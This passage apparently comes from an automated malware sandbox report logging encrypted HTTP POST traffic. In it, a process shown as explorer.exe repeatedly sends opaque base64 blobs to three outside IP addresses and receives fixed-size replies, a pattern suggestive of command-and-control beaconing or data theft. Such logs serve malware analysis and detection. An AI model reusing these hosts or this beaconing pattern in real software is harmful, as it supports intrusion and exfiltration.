                                                                              2024-07-27 12:53:56 UTC1267OUTData Raw: 54 7a 58 7a 4a 45 4d 69 73 4c 69 54 35 43 53 6b 56 45 43 57 6e 44 75 6d 34 45 2f 64 69 56 4d 56 6c 41 6e 79 59 50 38 72 53 2b 69 52 64 36 78 6e 4f 63 57 6c 6b 4c 5a 54 77 32 76 6b 79 78 6c 77 2f 4d 48 2b 7a 63 6f 37 35 57 49 50 67 72 4d 63 47 66 7a 38 56 46 49 43 46 2b 35 67 44 37 4d 49 77 56 54 42 46 56 57 6a 79 6d 70 41 77 4b 4d 49 78 77 39 74 56 5a 44 58 78 6d 4c 34 57 42 6f 49 67 65 61 4a 6e 31 51 57 54 50 38 57 7a 4e 51 4a 32 4a 31 76 6c 33 6f 65 52 55 57 4f 4a 50 44 71 6d 76 50 75 67 51 33 63 4f 6b 34 31 33 59 51 4c 33 69 62 79 36 59 68 6f 30 69 34 69 6c 66 79 68 77 64 67 4b 6b 69 64 5a 61 6f 51 36 6f 43 4e 4b 6b 4b 41 6a 61 70 76 61 6b 50 32 59 45 73 7a 67 69 74 71 2f 56 49 6b 31 64 43 38 58 36 39 79 70 78 64 32 44 77 6a 7a 32 31 42 55 64 35 6c 72
                                                                              Data Ascii: TzXzJEMisLiT5CSkVECWnDum4E/diVMVlAnyYP8rS+iRd6xnOcWlkLZTw2vkyxlw/MH+zco75WIPgrMcGfz8VFICF+5gD7MIwVTBFVWjympAwKMIxw9tVZDXxmL4WBoIgeaJn1QWTP8WzNQJ2J1vl3oeRUWOJPDqmvPugQ3cOk413YQL3iby6Yho0i4ilfyhwdgKkidZaoQ6oCNKkKAjapvakP2YEszgitq/VIk1dC8X69ypxd2Dwjz21BUd5lr
                                                                              2024-07-27 12:53:57 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:57 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:57 UTC685INData Raw: 44 2f 46 55 6f 36 79 68 34 7a 62 79 38 63 69 55 46 65 7a 36 4a 35 6f 79 39 4f 77 6d 58 45 43 42 4c 42 39 75 45 6f 4c 38 48 64 73 76 2b 64 37 69 55 52 6f 33 30 48 6e 66 58 4b 65 36 6b 59 31 56 48 46 4f 78 63 2b 56 2f 2f 6d 61 4e 53 6f 45 62 57 2f 56 46 34 65 58 32 52 5a 37 4f 6a 43 66 34 6c 55 51 6d 41 56 4b 45 39 37 55 44 71 70 2b 5a 6b 37 57 55 2f 69 6c 75 4a 30 48 51 42 4a 2f 6f 37 61 56 32 71 6b 64 70 2b 66 30 6b 45 62 63 7a 76 35 70 39 74 6e 32 5a 30 67 4f 64 4f 71 55 79 50 4c 47 4c 69 49 34 32 71 51 75 2b 72 7a 66 38 6d 4c 5a 41 61 70 2b 53 72 45 6d 2f 4b 62 4e 32 34 6b 67 2f 6a 31 67 2f 6a 4c 4a 66 59 43 45 4a 2f 62 6f 6f 69 61 75 44 43 52 2f 58 47 51 78 61 58 4f 36 68 49 56 34 38 71 78 36 50 4c 67 2b 49 58 6d 51 33 66 30 4d 32 35 65 6d 5a 74 44 59
                                                                              Data Ascii: D/FUo6yh4zby8ciUFez6J5oy9OwmXECBLB9uEoL8Hdsv+d7iURo30HnfXKe6kY1VHFOxc+V//maNSoEbW/VF4eX2RZ7OjCf4lUQmAVKE97UDqp+Zk7WU/iluJ0HQBJ/o7aV2qkdp+f0kEbczv5p9tn2Z0gOdOqUyPLGLiI42qQu+rzf8mLZAap+SrEm/KbN24kg/j1g/jLJfYCEJ/booiauDCR/XGQxaXO6hIV48qx6PLg+IXmQ3f0M25emZtDY


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.449801167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:58 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:58 UTC1267OUTData Raw: 6f 42 6e 56 6a 49 38 6c 74 45 46 36 50 53 41 6f 4a 67 64 79 67 59 35 54 79 63 73 38 6c 62 7a 43 64 76 67 32 66 64 30 75 61 4c 38 7a 55 38 4c 49 61 41 2b 63 46 42 39 51 31 67 72 32 43 73 69 42 7a 36 6f 65 4e 6a 64 72 2f 38 57 31 43 7a 74 6c 57 72 75 66 77 4c 62 37 52 76 79 55 48 55 59 4c 2b 64 56 59 44 41 58 62 61 4b 48 6a 4e 44 49 62 34 35 76 38 49 6a 42 62 63 78 48 64 49 42 6a 53 30 74 72 52 30 43 69 64 52 46 67 32 55 71 30 64 6b 2b 63 4f 34 6f 37 4d 6d 74 4f 6c 47 33 2f 2f 62 39 46 51 41 33 61 30 42 59 48 78 6d 49 71 4a 57 4e 71 5a 58 6b 41 56 62 6b 6c 4f 74 69 33 75 6b 49 42 49 4f 72 32 74 65 44 77 47 50 30 70 39 32 62 45 6a 65 6c 56 41 57 4d 75 61 2b 68 44 53 69 52 47 49 78 41 31 54 4b 51 43 4e 50 51 4e 4b 48 7a 43 55 46 2b 64 41 79 7a 38 73 6a 5a 44
                                                                              Data Ascii: oBnVjI8ltEF6PSAoJgdygY5Tycs8lbzCdvg2fd0uaL8zU8LIaA+cFB9Q1gr2CsiBz6oeNjdr/8W1CztlWrufwLb7RvyUHUYL+dVYDAXbaKHjNDIb45v8IjBbcxHdIBjS0trR0CidRFg2Uq0dk+cO4o7MmtOlG3//b9FQA3a0BYHxmIqJWNqZXkAVbklOti3ukIBIOr2teDwGP0p92bEjelVAWMua+hDSiRGIxA1TKQCNPQNKHzCUF+dAyz8sjZD
                                                                              2024-07-27 12:53:59 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:59 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:59 UTC685INData Raw: 58 75 67 44 63 78 32 74 4e 74 30 6f 32 57 48 46 45 43 2b 77 76 58 64 56 7a 4f 50 48 73 73 62 44 44 5a 2f 53 77 65 33 52 59 31 57 6b 6b 50 79 37 4a 35 50 4e 38 75 44 48 6b 44 74 52 30 36 38 45 47 54 2b 44 33 72 4c 32 77 37 58 58 4b 57 49 78 63 47 59 78 47 71 4b 66 2f 4a 4a 50 6d 55 43 5a 73 69 51 47 79 6f 44 47 47 6c 38 33 52 71 46 53 46 4a 4c 72 44 36 39 72 45 78 4d 52 50 49 58 79 2f 55 61 52 78 71 35 32 32 69 6a 37 41 36 6f 2b 61 4e 31 38 55 6d 48 31 53 69 75 37 50 48 63 72 55 66 6f 6f 53 57 53 68 57 7a 2b 6f 49 7a 6a 71 79 75 6a 4b 58 31 6d 70 42 79 59 7a 35 56 53 51 65 44 58 46 2f 68 76 68 38 70 68 6e 39 6f 35 50 74 41 4a 56 42 31 2b 55 58 5a 33 4a 41 38 71 62 35 64 39 66 34 51 62 75 61 53 32 49 4f 2f 52 34 7a 68 47 75 47 33 47 49 78 57 30 67 6c 54 4a
                                                                              Data Ascii: XugDcx2tNt0o2WHFEC+wvXdVzOPHssbDDZ/Swe3RY1WkkPy7J5PN8uDHkDtR068EGT+D3rL2w7XXKWIxcGYxGqKf/JJPmUCZsiQGyoDGGl83RqFSFJLrD69rExMRPIXy/UaRxq522ij7A6o+aN18UmH1Siu7PHcrUfooSWShWz+oIzjqyujKX1mpByYz5VSQeDXF/hvh8phn9o5PtAJVB1+UXZ3JA8qb5d9f4QbuaS2IO/R4zhGuG3GIxW0glTJ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.449802107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:00 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:00 UTC1122OUTData Raw: 6e 47 4d 54 50 4b 58 52 47 71 50 50 74 77 71 36 65 6c 65 70 4b 46 47 78 4c 4a 32 32 4d 76 54 65 37 69 32 68 39 79 4a 4a 54 4c 46 42 50 38 70 30 4f 44 63 49 48 6e 6c 31 54 2f 35 57 65 6a 37 48 2b 30 6e 58 4a 6b 67 4d 31 7a 58 58 64 73 68 4a 55 77 45 35 4d 62 69 62 6f 54 46 56 73 44 69 5a 47 37 38 77 53 46 62 70 77 5a 64 4a 6c 34 51 66 50 4f 4b 75 62 75 6b 69 7a 4a 38 43 7a 72 73 6f 6a 59 63 4f 2b 69 30 71 58 4e 61 67 78 76 31 69 6a 32 65 65 52 58 57 79 61 52 51 6a 73 4d 70 57 32 66 58 47 72 61 76 33 52 55 68 39 70 38 74 31 58 71 70 45 4c 51 2f 56 6f 37 32 46 41 49 37 72 6f 46 50 4b 30 46 75 6c 49 55 44 49 57 2b 76 6b 66 6d 62 47 74 35 43 57 43 57 53 72 43 78 4b 53 41 2f 68 4a 4a 75 64 7a 4a 6d 34 69 73 6c 44 45 39 71 50 65 63 48 4b 73 65 2b 64 30 47 54 46
                                                                              Data Ascii: nGMTPKXRGqPPtwq6elepKFGxLJ22MvTe7i2h9yJJTLFBP8p0ODcIHnl1T/5Wej7H+0nXJkgM1zXXdshJUwE5MbiboTFVsDiZG78wSFbpwZdJl4QfPOKubukizJ8CzrsojYcO+i0qXNagxv1ij2eeRXWyaRQjsMpW2fXGrav3RUh9p8t1XqpELQ/Vo72FAI7roFPK0FulIUDIW+vkfmbGt5CWCWSrCxKSA/hJJudzJm4islDE9qPecHKse+d0GTF
                                                                              2024-07-27 12:54:01 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:01 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:01 UTC685INData Raw: 57 38 63 34 79 65 49 6f 71 49 73 39 56 7a 6c 30 43 4d 59 42 4e 52 58 7a 46 44 4c 4e 50 61 48 6c 54 30 55 4f 44 77 30 73 76 6b 78 4b 2f 4d 36 6c 63 6d 72 56 71 57 52 4b 46 52 70 44 76 33 33 54 38 50 6d 42 4f 69 46 65 70 4b 49 30 61 51 32 4a 4e 67 55 34 6c 36 32 6f 57 56 30 34 36 35 4e 2f 41 56 73 74 6d 4a 41 37 34 39 47 7a 6d 61 52 4b 47 71 4d 61 4f 49 56 55 54 43 34 34 54 74 2f 48 52 70 67 46 75 59 36 2f 56 51 67 6c 58 4f 57 64 6a 32 33 64 76 58 73 64 7a 62 50 73 51 37 6a 77 41 67 67 42 42 5a 55 46 6c 6e 36 2f 7a 6a 41 74 45 5a 64 66 4e 63 47 48 53 69 42 57 55 73 45 36 7a 46 2b 56 6a 35 37 38 48 68 69 55 6c 4b 6c 42 77 7a 4f 56 79 76 5a 50 49 45 51 57 42 79 46 75 6b 41 32 77 6c 55 63 50 6b 65 50 77 45 6d 4d 46 64 54 69 38 4d 51 39 2b 51 79 66 63 6b 6a 4a
                                                                              Data Ascii: W8c4yeIoqIs9Vzl0CMYBNRXzFDLNPaHlT0UODw0svkxK/M6lcmrVqWRKFRpDv33T8PmBOiFepKI0aQ2JNgU4l62oWV0465N/AVstmJA749GzmaRKGqMaOIVUTC44Tt/HRpgFuY6/VQglXOWdj23dvXsdzbPsQ7jwAggBBZUFln6/zjAtEZdfNcGHSiBWUsE6zF+Vj578HhiUlKlBwzOVyvZPIEQWByFukA2wlUcPkePwEmMFdTi8MQ9+QyfckjJ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.449803107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:02 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:54:02 UTC1267OUTData Raw: 58 4b 46 69 52 37 44 30 31 39 41 75 43 7a 4e 7a 38 30 4c 30 59 78 59 32 63 39 59 53 73 6a 2b 37 67 2f 4c 4a 4f 54 6a 42 58 72 2b 31 68 4f 77 79 4c 35 37 77 4f 79 34 66 51 68 71 47 6e 70 49 62 75 4a 61 65 47 48 6b 58 62 37 63 65 46 7a 68 56 72 66 61 68 34 43 74 34 51 4f 56 65 45 42 72 32 7a 67 41 38 30 38 4d 66 39 2b 56 64 66 74 39 42 68 72 78 6b 73 59 69 58 75 6c 4c 76 77 41 31 4f 35 65 6b 48 41 4c 38 36 6e 64 57 4a 4a 77 32 44 30 6d 2f 75 37 2f 2f 79 33 72 4e 36 74 51 67 52 64 6f 74 78 66 6f 79 67 38 6d 77 62 42 77 5a 45 38 36 55 31 43 7a 55 55 4d 58 52 51 69 78 44 4f 32 4f 70 68 5a 39 4d 30 2b 72 45 31 2b 62 43 46 72 33 44 6d 74 4e 78 45 6f 42 52 63 78 37 46 31 44 77 75 51 35 4f 75 76 55 32 38 4c 53 6c 74 48 65 70 5a 6a 6f 46 61 4a 43 69 4e 61 32 4c 6c
                                                                              Data Ascii: XKFiR7D019AuCzNz80L0YxY2c9YSsj+7g/LJOTjBXr+1hOwyL57wOy4fQhqGnpIbuJaeGHkXb7ceFzhVrfah4Ct4QOVeEBr2zgA808Mf9+Vdft9BhrxksYiXulLvwA1O5ekHAL86ndWJJw2D0m/u7//y3rN6tQgRdotxfoyg8mwbBwZE86U1CzUUMXRQixDO2OphZ9M0+rE1+bCFr3DmtNxEoBRcx7F1DwuQ5OuvU28LSltHepZjoFaJCiNa2Ll
                                                                              2024-07-27 12:54:03 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:03 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:03 UTC685INData Raw: 70 79 57 64 58 62 44 42 30 78 32 56 63 37 35 6b 43 55 5a 76 67 4f 6f 47 79 2f 5a 72 33 75 7a 2f 61 45 70 78 4e 4a 46 37 56 2b 65 4d 54 44 66 30 59 59 6b 63 67 4b 44 2b 30 6b 53 35 56 51 48 52 36 52 6b 72 6b 47 6b 66 4b 4e 59 71 48 69 4c 73 7a 49 31 38 78 50 61 4f 6c 66 49 6a 6d 35 34 44 6c 4d 78 70 6f 6c 6b 66 2f 44 67 68 4c 4d 6d 6e 6c 4a 55 70 51 2b 32 4f 30 51 4e 50 42 4e 35 35 4d 73 4d 6e 4f 43 7a 4b 32 44 52 30 50 4f 61 31 5a 76 77 38 66 73 43 77 51 55 52 43 74 57 44 47 57 31 43 68 4e 6d 4a 77 2f 57 79 46 76 4e 34 6d 6e 70 46 4c 4f 62 79 36 56 4e 78 69 56 35 49 53 44 65 43 52 33 30 63 47 6d 66 76 4c 31 53 4d 43 71 35 6a 50 4c 64 44 67 6e 4a 63 49 5a 2f 79 48 61 71 4b 58 4b 50 77 41 6f 68 55 34 45 76 4f 36 2b 58 73 46 79 53 42 44 62 39 4f 6e 47 54 36
                                                                              Data Ascii: pyWdXbDB0x2Vc75kCUZvgOoGy/Zr3uz/aEpxNJF7V+eMTDf0YYkcgKD+0kS5VQHR6RkrkGkfKNYqHiLszI18xPaOlfIjm54DlMxpolkf/DghLMmnlJUpQ+2O0QNPBN55MsMnOCzK2DR0POa1Zvw8fsCwQURCtWDGW1ChNmJw/WyFvN4mnpFLOby6VNxiV5ISDeCR30cGmfvL1SMCq5jPLdDgnJcIZ/yHaqKXKPwAohU4EvO6+XsFySBDb9OnGT6


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.449804167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:04 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:54:04 UTC1267OUTData Raw: 4e 33 71 5a 51 4a 46 64 48 59 61 33 58 33 68 33 4a 4f 75 52 68 35 2b 56 68 4f 4b 70 59 57 55 57 35 50 4b 42 36 56 74 52 4d 41 49 35 51 4d 2b 43 61 57 47 4d 4a 6c 58 6c 54 52 51 6e 67 70 4a 56 39 6d 33 69 66 31 54 6f 50 4a 6b 56 6a 38 52 76 52 66 55 6b 69 31 37 2f 36 32 35 4e 44 62 57 6d 7a 6d 4b 6e 49 51 48 47 79 56 32 31 45 6d 53 66 6b 75 2f 44 30 4c 45 41 6d 68 30 78 75 6e 36 34 50 65 6c 50 57 4c 71 46 6d 30 76 6c 2f 78 2b 4c 5a 65 74 45 4f 6b 39 76 57 75 50 4e 36 71 55 47 6d 6a 54 52 5a 50 73 7a 65 6b 70 58 5a 55 49 6b 38 74 61 46 64 48 66 46 39 73 51 49 49 54 47 42 6d 4c 32 44 78 7a 61 51 67 43 75 2b 35 6e 6d 54 63 54 31 76 53 79 4b 31 43 57 68 39 6e 55 63 66 46 4a 5a 51 6f 74 36 4d 56 7a 50 71 36 51 37 57 34 4d 70 77 6b 78 4a 46 41 43 77 54 30 72 53
                                                                              Data Ascii: N3qZQJFdHYa3X3h3JOuRh5+VhOKpYWUW5PKB6VtRMAI5QM+CaWGMJlXlTRQngpJV9m3if1ToPJkVj8RvRfUki17/625NDbWmzmKnIQHGyV21EmSfku/D0LEAmh0xun64PelPWLqFm0vl/x+LZetEOk9vWuPN6qUGmjTRZPszekpXZUIk8taFdHfF9sQIITGBmL2DxzaQgCu+5nmTcT1vSyK1CWh9nUcfFJZQot6MVzPq6Q7W4MpwkxJFACwT0rS
                                                                              2024-07-27 12:54:05 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:05 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:05 UTC685INData Raw: 48 77 74 33 36 36 47 38 6a 59 50 54 51 73 2f 6a 76 4f 71 78 52 43 35 55 4a 34 67 38 44 31 4e 31 67 48 70 38 56 6d 68 61 32 4f 54 4c 62 6f 76 4b 30 78 71 4f 4b 7a 44 74 44 58 6b 76 58 68 49 54 34 61 6d 66 4c 30 49 39 6b 76 37 54 73 53 77 51 6f 31 64 64 55 32 35 62 4d 52 68 74 4d 2b 71 31 79 68 31 61 6e 31 4a 6a 37 4e 73 37 56 36 79 6e 79 41 41 38 59 34 6a 74 50 32 72 39 78 75 32 77 54 71 32 75 65 4f 42 63 64 34 36 47 59 76 6d 6a 79 79 2b 4b 37 4d 65 33 49 76 5a 61 6f 6f 4c 68 78 49 6f 52 78 75 55 76 71 69 54 48 34 52 74 32 49 69 61 4d 77 43 2f 55 61 4b 32 50 51 79 35 36 61 7a 49 59 42 4d 41 4b 53 30 31 43 30 35 74 56 6f 70 51 43 59 6f 61 57 71 66 38 47 30 31 63 42 4b 45 51 32 75 47 36 65 46 79 37 4a 6a 6b 35 78 46 65 59 6e 37 54 59 69 36 68 71 33 74 37 33
                                                                              Data Ascii: Hwt366G8jYPTQs/jvOqxRC5UJ4g8D1N1gHp8Vmha2OTLbovK0xqOKzDtDXkvXhIT4amfL0I9kv7TsSwQo1ddU25bMRhtM+q1yh1an1Jj7Ns7V6ynyAA8Y4jtP2r9xu2wTq2ueOBcd46GYvmjyy+K7Me3IvZaooLhxIoRxuUvqiTH4Rt2IiaMwC/UaK2PQy56azIYBMAKS01C05tVopQCYoaWqf8G01cBKEQ2uG6eFy7Jjk5xFeYn7TYi6hq3t73


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.449805107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:06 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:06 UTC1122OUTData Raw: 6c 6d 74 69 38 39 52 37 4f 48 43 33 49 71 62 7a 38 67 61 53 39 70 74 73 55 76 5a 41 47 67 48 42 72 49 76 55 6f 52 52 45 44 58 52 43 52 58 4e 52 50 46 49 51 69 77 75 68 2b 5a 5a 35 65 7a 63 7a 6a 52 49 43 78 36 58 4b 6b 73 73 48 50 6e 2b 33 70 50 70 32 66 72 72 64 53 47 37 49 46 6f 72 51 55 45 42 75 76 37 56 72 63 2f 4a 61 4d 72 56 6a 65 43 76 54 75 37 67 5a 63 76 6c 58 51 30 75 78 4a 33 41 56 6c 71 2b 70 35 39 36 76 43 50 70 5a 57 6e 5a 38 50 46 74 4a 75 7a 50 78 45 34 45 64 63 67 38 69 5a 6b 42 65 37 34 6c 4b 49 47 36 4c 51 74 54 42 71 4b 6e 74 4d 67 4e 36 53 41 61 72 6a 31 4b 34 63 36 53 78 45 76 38 38 4a 6f 43 57 53 67 4f 42 46 63 32 69 2b 37 32 4a 61 61 33 36 46 72 46 42 43 61 77 54 56 44 71 55 51 75 59 4e 77 50 5a 6f 53 42 57 6e 48 35 65 4a 4c 34 4a
                                                                              Data Ascii: lmti89R7OHC3Iqbz8gaS9ptsUvZAGgHBrIvUoRREDXRCRXNRPFIQiwuh+ZZ5ezczjRICx6XKkssHPn+3pPp2frrdSG7IForQUEBuv7Vrc/JaMrVjeCvTu7gZcvlXQ0uxJ3AVlq+p596vCPpZWnZ8PFtJuzPxE4Edcg8iZkBe74lKIG6LQtTBqKntMgN6SAarj1K4c6SxEv88JoCWSgOBFc2i+72Jaa36FrFBCawTVDqUQuYNwPZoSBWnH5eJL4J
                                                                              2024-07-27 12:54:07 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:07 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:07 UTC685INData Raw: 4e 70 36 43 4a 68 33 30 65 43 4e 37 6c 2f 46 33 75 75 57 36 31 70 48 73 4b 5a 65 4e 4f 41 53 77 4b 4f 4d 50 4e 55 74 46 44 54 46 39 30 56 6c 6b 30 64 50 6a 50 6f 79 77 4d 57 63 75 52 2f 42 42 77 4f 54 31 4e 2f 44 49 73 43 54 4c 73 52 4b 73 54 52 4b 31 6e 6b 46 35 58 6f 2b 4b 62 31 48 70 56 31 45 70 48 63 47 77 76 46 37 4f 2b 48 55 70 45 52 57 77 63 6f 32 65 6d 6a 34 43 4f 74 76 67 75 52 46 36 35 46 4b 76 51 73 79 37 72 6d 70 4b 48 45 6e 62 45 78 77 74 56 73 61 31 59 37 36 4a 35 4e 4b 49 6d 58 37 51 6b 2f 42 34 36 39 51 4c 38 50 66 4d 37 6e 2b 65 38 30 43 79 49 4d 75 37 6f 4f 73 67 6e 36 57 69 57 73 37 51 4e 62 41 4f 58 6b 42 39 5a 66 69 49 30 55 75 4c 4b 69 75 34 4d 69 70 33 43 4e 58 6f 6d 64 4c 6e 36 56 67 68 48 49 36 57 64 68 34 69 76 70 37 68 50 58 6c
                                                                              Data Ascii: Np6CJh30eCN7l/F3uuW61pHsKZeNOASwKOMPNUtFDTF90Vlk0dPjPoywMWcuR/BBwOT1N/DIsCTLsRKsTRK1nkF5Xo+Kb1HpV1EpHcGwvF7O+HUpERWwco2emj4COtvguRF65FKvQsy7rmpKHEnbExwtVsa1Y76J5NKImX7Qk/B469QL8PfM7n+e80CyIMu7oOsgn6WiWs7QNbAOXkB9ZfiI0UuLKiu4Mip3CNXomdLn6VghHI6Wdh4ivp7hPXl


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.449806107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:08 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:54:08 UTC1122OUTData Raw: 70 4d 75 79 6a 43 4f 54 63 68 48 43 54 66 4f 4b 44 66 6b 36 35 67 37 66 72 6f 41 39 51 73 4e 56 6a 6f 4e 2b 34 74 37 69 55 43 75 4a 62 66 6d 66 75 2b 78 42 4b 4d 56 58 63 68 68 74 46 78 77 62 57 6e 38 37 6a 30 49 33 35 75 65 4e 6d 37 51 71 73 51 37 47 71 6f 4b 4f 79 74 44 61 39 79 68 38 69 39 68 54 6b 77 62 44 30 52 71 65 44 58 48 70 4e 61 67 52 79 69 46 46 54 68 6b 50 30 53 75 46 53 72 66 4b 59 7a 76 35 43 56 35 6c 48 63 61 55 6a 6a 4f 6d 4f 45 66 68 66 47 54 68 7a 45 69 6a 4f 6a 58 6b 53 2f 39 59 6f 5a 77 31 52 37 35 72 65 77 38 75 6a 75 63 49 38 42 4a 74 70 67 55 45 50 33 6d 61 44 30 4b 48 4a 63 45 6a 72 75 2b 32 46 67 66 4e 39 52 5a 39 70 4a 44 39 6d 78 6e 4d 2f 37 54 44 75 79 46 55 44 33 75 54 42 75 4b 70 44 38 63 2b 30 38 71 4b 30 6c 71 5a 75 78 34
                                                                              Data Ascii: pMuyjCOTchHCTfOKDfk65g7froA9QsNVjoN+4t7iUCuJbfmfu+xBKMVXchhtFxwbWn87j0I35ueNm7QqsQ7GqoKOytDa9yh8i9hTkwbD0RqeDXHpNagRyiFFThkP0SuFSrfKYzv5CV5lHcaUjjOmOEfhfGThzEijOjXkS/9YoZw1R75rew8ujucI8BJtpgUEP3maD0KHJcEjru+2FgfN9RZ9pJD9mxnM/7TDuyFUD3uTBuKpD8c+08qK0lqZux4
                                                                              2024-07-27 12:54:09 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:54:09 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:54:09 UTC685INData Raw: 4f 70 6f 48 71 52 57 6c 74 55 66 64 52 59 74 48 75 52 50 76 30 57 39 62 66 64 66 66 50 43 4d 62 56 33 4b 68 6f 76 54 75 77 5a 4a 57 50 4f 42 58 2f 66 76 74 7a 6f 2b 32 35 49 38 45 52 34 50 37 50 48 59 73 37 6e 35 68 42 59 6a 2f 4c 5a 70 63 66 34 72 51 7a 6f 66 32 66 74 78 72 6f 79 51 6f 62 5a 67 41 62 65 65 30 7a 2b 2b 4e 4c 69 68 43 4a 63 50 49 6a 73 4f 78 65 66 4c 33 33 70 48 52 57 4c 72 65 52 35 37 37 79 55 4d 31 6e 37 55 4b 6c 43 32 64 73 7a 7a 35 58 42 71 6b 69 65 72 78 34 66 58 77 34 34 35 53 4f 52 36 70 73 66 45 6c 36 2b 38 48 6e 64 39 53 4b 6d 74 32 67 66 49 52 33 73 4e 65 37 51 73 68 30 45 6a 4b 50 59 4b 68 6c 38 50 6e 53 30 6e 71 70 51 71 71 79 55 46 2b 53 58 77 51 67 54 6b 2b 54 79 48 6e 48 53 41 36 2b 35 59 71 38 46 4e 4e 56 55 57 31 42 33 32
                                                                              Data Ascii: OpoHqRWltUfdRYtHuRPv0W9bfdffPCMbV3KhovTuwZJWPOBX/fvtzo+25I8ER4P7PHYs7n5hBYj/LZpcf4rQzof2ftxroyQobZgAbee0z++NLihCJcPIjsOxefL33pHRWLreR577yUM1n7UKlC2dszz5XBqkierx4fXw445SOR6psfEl6+8Hnd9SKmt2gfIR3sNe7Qsh0EjKPYKhl8PnS0nqpQqqyUF+SXwQgTk+TyHnHSA6+5Yq8FNNVUW1B32


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.449807167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:54:10 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
